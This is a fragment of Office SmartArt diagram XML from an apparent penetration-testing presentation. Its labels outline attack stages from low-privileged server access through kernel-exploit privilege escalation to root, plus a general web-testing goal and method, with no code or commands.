    </dgm:pt>
    <dgm:pt modelId="{76B48704-A036-4833-8EAE-21069C557816}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>Server Access – Low Privileged User</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88B52DF0-BE51-4BDC-8502-8F5E8291C961}" type="parTrans" cxnId="{BC35ADBF-76CA-42FD-91E9-32DAD1A07ADD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{231723A1-E8B2-4443-804E-D0AC6972E67A}" type="sibTrans" cxnId="{BC35ADBF-76CA-42FD-91E9-32DAD1A07ADD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F4C0490-A83A-4F8A-9D82-17AF243D14BD}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Privilege Escalation – Kernel Exploit</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1406801-5E1B-4EDD-83F6-0F1B206347E7}" type="parTrans" cxnId="{90528499-A96E-498D-A5E8-68D2B69E7A1C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EAE9E7E-38E0-48BE-B0C5-C05A70D0830B}" type="sibTrans" cxnId="{90528499-A96E-498D-A5E8-68D2B69E7A1C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7302BBD7-1A32-4335-8E56-F0B6F127F0A0}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>Server Access - root</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8EDD86ED-471E-4547-A29C-318D2C77C0A1}" type="parTrans" cxnId="{357E94FE-5792-4365-92B0-77B015ED8752}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C2C67ED-18A9-4B2A-B444-737351DF2E39}" type="sibTrans" cxnId="{357E94FE-5792-4365-92B0-77B015ED8752}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3BAE46D-5F7D-4075-8190-1FF917534253}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Unfettered Access</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10C00B2E-5665-4A1E-B8E5-55E6186DB1C7}" type="parTrans" cxnId="{667ABBC0-9830-4FCB-96C4-770F2585D3CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C3595CD-3FF5-4F45-A5EF-BDAD9C4F5FA4}" type="sibTrans" cxnId="{667ABBC0-9830-4FCB-96C4-770F2585D3CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE2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FF05AE-E094-4958-BF65-D1159883DF0E}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22}" presName="dummyMaxCanvas" presStyleCnt="0">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DF8BB15E-3CDD-4D88-B074-1DC8D4660CE7}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22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B1122-201A-4BA9-B3EF-6126B527E03B}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22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089F5-A00B-4F38-BFD7-8F7EDFFA53FC}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22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E1AF7-0ED2-4BB1-9049-19B3624BA944}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE2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785C7-DCE7-443D-8193-31D88B86BC9C}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE2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6B617-4D6C-4C87-9041-5E91E733C732}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22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8856E-D9C0-4F8F-9E9C-AA82E21BBEDC}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22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0F2C6-23F9-40DB-9FC1-400D5BEBA656}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22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2EF4B-A10D-4A0A-90B0-309B54A8D539}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22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0629F-9C2B-460A-9920-C5A15B8663F7}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22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A98FD-4FB0-4D54-8C9B-739480DEE493}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22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5D99-7C1A-4927-9064-30C9AD79008D}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22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56C45-6F41-4CF0-987F-F50780D61B32}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE2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3906E-3200-4EF0-840A-0A759141CFBE}" type="pres">
      <dgm:prSet presAssocID="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE2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6D4BE-EC7F-464E-9B09-5559D370844E}" srcId="{03F0606F-8C5D-42DA-8D4F-F16D28DC0DCD}" destId="{0531A41C-12B8-46E2-A9EB-70B4F7925457}" srcOrd="0" destOrd="0" parTransId="{E7155650-067E-4DBF-8911-FF55A4A048E1}" sibTransId="{AB046912-045E-41D5-A9F4-4C854CA29781}"/>
    <dgm:cxn modelId="{272523AA-14E5-4138-8680-C3B52B3E4A61}" srcId="{9895992A-28CB-4D87-BBEA-FB64FA34D091}" destId="{B744E046-40A9-417D-90CD-5F16FDF30B42}" srcOrd="0" destOrd="0" parTransId="{2B8F60DF-C0AD-49FE-A76B-138C88360FD3}" sibTransId="{EE329873-B376-4637-8783-B9317B377A49}"/>
    <dgm:cxn modelId="{DC582E33-C06B-4258-B406-9BFB11A30AFD}" srcId="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22}" destId="{03F0606F-8C5D-42DA-8D4F-F16D28DC0DCD}" srcOrd="0" destOrd="0" parTransId="{4ADF41B5-77F6-4A72-887A-7C15DCBC71F4}" sibTransId="{600EF39F-CAA4-4F0C-874D-07CA789E448A}"/>
    <dgm:cxn modelId="{9FF8C635-B3DC-4E3C-88FA-095695B2C25B}" type="presOf" srcId="{9895992A-28CB-4D87-BBEA-FB64FA34D091}" destId="{67BB1122-201A-4BA9-B3EF-6126B527E03B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{C01E159C-1CB5-4E90-9099-494ADDC8D6E2}" type="presOf" srcId="{772CCF14-886D-4D18-937A-37EBAAE9C282}" destId="{7560F2C6-23F9-40DB-9FC1-400D5BEBA656}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{341A26F6-18B8-4C44-8C5A-99AFDB94B785}" type="presOf" srcId="{C70DB3D5-AB93-4071-B215-289C9782ADD2}" destId="{B59F5D99-7C1A-4927-9064-30C9AD79008D}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{6273611D-A959-453C-8D3E-77C69C42970C}" type="presOf" srcId="{231723A1-E8B2-4443-804E-D0AC6972E67A}" destId="{6012EF4B-A10D-4A0A-90B0-309B54A8D539}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{32FBED99-59E8-49A1-B443-234A5120DD09}" type="presOf" srcId="{63D11F23-65FA-4010-B9DC-98834F39C69E}" destId="{B59F5D99-7C1A-4927-9064-30C9AD79008D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{90528499-A96E-498D-A5E8-68D2B69E7A1C}" srcId="{76B48704-A036-4833-8EAE-21069C557816}" destId="{2F4C0490-A83A-4F8A-9D82-17AF243D14BD}" srcOrd="0" destOrd="0" parTransId="{E1406801-5E1B-4EDD-83F6-0F1B206347E7}" sibTransId="{3EAE9E7E-38E0-48BE-B0C5-C05A70D0830B}"/>
    <dgm:cxn modelId="{46DF3CE9-6F21-42D8-8884-60513222E415}" type="presOf" srcId="{A3BAE46D-5F7D-4075-8190-1FF917534253}" destId="{396785C7-DCE7-443D-8193-31D88B86BC9C}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{7E3EBF48-EC9E-4399-8977-E5B64FF5F6E1}" type="presOf" srcId="{0531A41C-12B8-46E2-A9EB-70B4F7925457}" destId="{DF8BB15E-3CDD-4D88-B074-1DC8D4660CE7}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{50BCC881-C5B7-44EC-B2C7-89F29D762C78}" type="presOf" srcId="{9895992A-28CB-4D87-BBEA-FB64FA34D091}" destId="{60AA98FD-4FB0-4D54-8C9B-739480DEE493}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{BC35ADBF-76CA-42FD-91E9-32DAD1A07ADD}" srcId="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22}" destId="{76B48704-A036-4833-8EAE-21069C557816}" srcOrd="3" destOrd="0" parTransId="{88B52DF0-BE51-4BDC-8502-8F5E8291C961}" sibTransId="{231723A1-E8B2-4443-804E-D0AC6972E67A}"/>
    <dgm:cxn modelId="{3703FF3B-FF61-4994-8757-D0C311F5AC4E}" type="presOf" srcId="{63D11F23-65FA-4010-B9DC-98834F39C69E}" destId="{BFE089F5-A00B-4F38-BFD7-8F7EDFFA53FC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{22FB7741-6753-4042-ADCC-FF507E988AEB}" type="presOf" srcId="{B744E046-40A9-417D-90CD-5F16FDF30B42}" destId="{60AA98FD-4FB0-4D54-8C9B-739480DEE493}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{6357069B-2194-482E-8C39-2F3F30B46FE7}" type="presOf" srcId="{A3BAE46D-5F7D-4075-8190-1FF917534253}" destId="{7893906E-3200-4EF0-840A-0A759141CFBE}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{E33B07E7-30F7-4801-9AF7-754D92125938}" type="presOf" srcId="{03F0606F-8C5D-42DA-8D4F-F16D28DC0DCD}" destId="{3C80629F-9C2B-460A-9920-C5A15B8663F7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{667ABBC0-9830-4FCB-96C4-770F2585D3CA}" srcId="{7302BBD7-1A32-4335-8E56-F0B6F127F0A0}" destId="{A3BAE46D-5F7D-4075-8190-1FF917534253}" srcOrd="0" destOrd="0" parTransId="{10C00B2E-5665-4A1E-B8E5-55E6186DB1C7}" sibTransId="{7C3595CD-3FF5-4F45-A5EF-BDAD9C4F5FA4}"/>
    <dgm:cxn modelId="{0F1E8445-6580-45BD-A5C9-C06EDE53E27B}" srcId="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22}" destId="{63D11F23-65FA-4010-B9DC-98834F39C69E}" srcOrd="2" destOrd="0" parTransId="{F6E5A335-0371-4BCA-84D2-539CC4CFBDCC}" sibTransId="{772CCF14-886D-4D18-937A-37EBAAE9C282}"/>
    <dgm:cxn modelId="{060421AC-BDAC-4599-9C4B-F807F3A21671}" type="presOf" srcId="{7302BBD7-1A32-4335-8E56-F0B6F127F0A0}" destId="{396785C7-DCE7-443D-8193-31D88B86BC9C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{2F8C7AA4-62E7-42D0-80DE-7F95608A0CDE}" type="presOf" srcId="{7302BBD7-1A32-4335-8E56-F0B6F127F0A0}" destId="{7893906E-3200-4EF0-840A-0A759141CFBE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{AECF95AE-9FB7-4075-8F99-D93D0D8B6B22}" type="presOf" srcId="{C70DB3D5-AB93-4071-B215-289C9782ADD2}" destId="{BFE089F5-A00B-4F38-BFD7-8F7EDFFA53FC}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{041CA862-75F4-4694-872B-18E92FC8A870}" type="presOf" srcId="{76B48704-A036-4833-8EAE-21069C557816}" destId="{A5F56C45-6F41-4CF0-987F-F50780D61B32}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{F5702441-C288-4874-AFED-38165997D8AE}" type="presOf" srcId="{B744E046-40A9-417D-90CD-5F16FDF30B42}" destId="{67BB1122-201A-4BA9-B3EF-6126B527E03B}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{50D3414B-32FB-445C-BE18-E79DFB7B4C85}" type="presOf" srcId="{03F0606F-8C5D-42DA-8D4F-F16D28DC0DCD}" destId="{DF8BB15E-3CDD-4D88-B074-1DC8D4660CE7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{2802B5EC-1ACE-402F-A7D5-6E35213C1E06}" type="presOf" srcId="{600EF39F-CAA4-4F0C-874D-07CA789E448A}" destId="{CEC6B617-4D6C-4C87-9041-5E91E733C732}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{1F4F0B64-6338-4EC5-9CFF-355693CA0AB3}" type="presOf" srcId="{0531A41C-12B8-46E2-A9EB-70B4F7925457}" destId="{3C80629F-9C2B-460A-9920-C5A15B8663F7}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{3E532744-6B5A-449B-B0D6-977739897DBC}" srcId="{63D11F23-65FA-4010-B9DC-98834F39C69E}" destId="{C70DB3D5-AB93-4071-B215-289C9782ADD2}" srcOrd="0" destOrd="0" parTransId="{F23D86C0-4C78-4B3A-B813-066081319478}" sibTransId="{66F2555F-55F6-4869-A5B3-A636A5C2A8AC}"/>
    <dgm:cxn modelId="{38CF23DE-29D8-421A-AAC5-A9D4F3820E74}" type="presOf" srcId="{23AECCFA-8D73-4E81-BD57-53635E9A3D55}" destId="{ECC8856E-D9C0-4F8F-9E9C-AA82E21BBEDC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{D9C5062A-22E4-4AAF-A7EC-EB5F0EBD937E}" type="presOf" srcId="{2F4C0490-A83A-4F8A-9D82-17AF243D14BD}" destId="{853E1AF7-0ED2-4BB1-9049-19B3624BA944}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{357E94FE-5792-4365-92B0-77B015ED8752}" srcId="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22}" destId="{7302BBD7-1A32-4335-8E56-F0B6F127F0A0}" srcOrd="4" destOrd="0" parTransId="{8EDD86ED-471E-4547-A29C-318D2C77C0A1}" sibTransId="{6C2C67ED-18A9-4B2A-B444-737351DF2E39}"/>
    <dgm:cxn modelId="{E2BB8CB4-D604-4E0A-B1E9-0F364CD5BBEE}" type="presOf" srcId="{2F4C0490-A83A-4F8A-9D82-17AF243D14BD}" destId="{A5F56C45-6F41-4CF0-987F-F50780D61B32}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{61384AB1-90A6-4554-A598-38B073CE5EB3}" type="presOf" srcId="{76B48704-A036-4833-8EAE-21069C557816}" destId="{853E1AF7-0ED2-4BB1-9049-19B3624BA944}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{31CCF30A-B5C6-4EC7-ACD7-8C60FAB00DDD}" type="presOf" srcId="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22}" destId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{B7ABFC2E-CEC0-4A50-8E44-1CB6CC6B6911}" srcId="{04E32E2D-E8BA-41A9-BDD5-89E1D9B7DE22}" destId="{9895992A-28CB-4D87-BBEA-FB64FA34D091}" srcOrd="1" destOrd="0" parTransId="{21FF7AAA-8E3E-4986-BACA-912B03FD200A}" sibTransId="{23AECCFA-8D73-4E81-BD57-53635E9A3D55}"/>
    <dgm:cxn modelId="{3F0F7EBD-17A5-473A-B7B4-B308479CFD67}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{F5FF05AE-E094-4958-BF65-D1159883DF0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{625297FE-9E43-47C4-AE5D-4DCF58BCCE25}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{DF8BB15E-3CDD-4D88-B074-1DC8D4660CE7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{BE001FF5-79EC-4E59-B485-9BA7265274A1}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{67BB1122-201A-4BA9-B3EF-6126B527E03B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{DCB399A4-A566-43AB-8F6B-0D856BA508A3}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{BFE089F5-A00B-4F38-BFD7-8F7EDFFA53FC}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{BCDBEA89-2540-4A81-B5F5-BBC4DAC51F14}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{853E1AF7-0ED2-4BB1-9049-19B3624BA944}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{613CB055-A3B8-442B-92CC-FFE6D039042A}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{396785C7-DCE7-443D-8193-31D88B86BC9C}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{47B5C6DC-ECCF-4557-A423-BF4F899CC125}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{CEC6B617-4D6C-4C87-9041-5E91E733C732}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{22032112-A808-49EA-BDD9-B4838BAF4184}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{ECC8856E-D9C0-4F8F-9E9C-AA82E21BBEDC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{D4ED5602-AB6D-4181-AE67-8AE5BE7EC67E}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{7560F2C6-23F9-40DB-9FC1-400D5BEBA656}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{A9C519EE-7FFA-495A-AF34-32ACD73C7F61}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{6012EF4B-A10D-4A0A-90B0-309B54A8D539}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{4F1E13CD-F400-4EA1-B4DD-69A635C8A26D}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{3C80629F-9C2B-460A-9920-C5A15B8663F7}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{4CD96C78-AAC1-472E-B8CC-8F9CB94587FB}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{60AA98FD-4FB0-4D54-8C9B-739480DEE493}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{FE477650-03F0-4080-9531-D7F70033C697}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{B59F5D99-7C1A-4927-9064-30C9AD79008D}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{4EBB1D01-820E-4F4A-BB6A-BF77410BE84F}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{A5F56C45-6F41-4CF0-987F-F50780D61B32}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{A685263D-8BDF-4106-B076-FA1BFBEE8562}" type="presParOf" srcId="{533D6460-F8BF-4653-9775-FEF44E9A90ED}" destId="{7893906E-3200-4EF0-840A-0A759141CFB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73193B-6909-48AD-8DB1-4A2285ABEA4D}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList5" loCatId="Inbox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B2E5388-BAAA-4012-BA1D-E5BFD6399588}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Goal</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1CA12E1-CA72-4F03-8324-865B6C5EB2A5}" type="parTrans" cxnId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}" type="sibTrans" cxnId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2F239BE-11C7-45FD-A69B-155E4F346977}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Analyze running service (HTTP) for information gathering and potential ways further into the asset</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AC01C8E-2045-4D9A-9390-5BA38ABDBAE2}" type="parTrans" cxnId="{905D1A78-FEBC-4921-8199-BC9C8F31A4E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE4CF2F4-21DA-42CC-AD5F-CC37A168799F}" type="sibTrans" cxnId="{905D1A78-FEBC-4921-8199-BC9C8F31A4E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53D818AB-1274-47A2-8F42-3B19A67F4AD2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Method</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F1E8FC57-6346-4D30-9941-C52A4C5A6850}" type="parTrans" cxnId="{FF2FA41A-6056-4C5E-B894-042F95091F1E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C68CD992-9615-4778-9DBF-9ABC886AEBD8}" type="sibTrans" cxnId="{FF2FA41A-6056-4C5E-B894-042F95091F1E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4962F4D0-8B60-497C-9236-01B5A4B3F378}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Navigating resources manually and/or automated. Perform various tests (client-side controls logic flaws, authentication, session management, access controls, errors, information leakage, etc.,.)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5CE9945A-82D7-48F1-9D68-345CD4E9AF0C}" type="parTrans" cxnId="{5CA1D828-C8EA-49EC-91CB-E966913A7C4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD382A61-1D4A-438C-BF29-CD01FC83DAF7}" type="sibTrans" cxnId="{5CA1D828-C8EA-49EC-91CB-E966913A7C4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F544C4B-F022-4F64-A4B9-C5A0146738D7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Common Tools</a:t>
          </a:r>
        </a:p>
      </dgm:t>
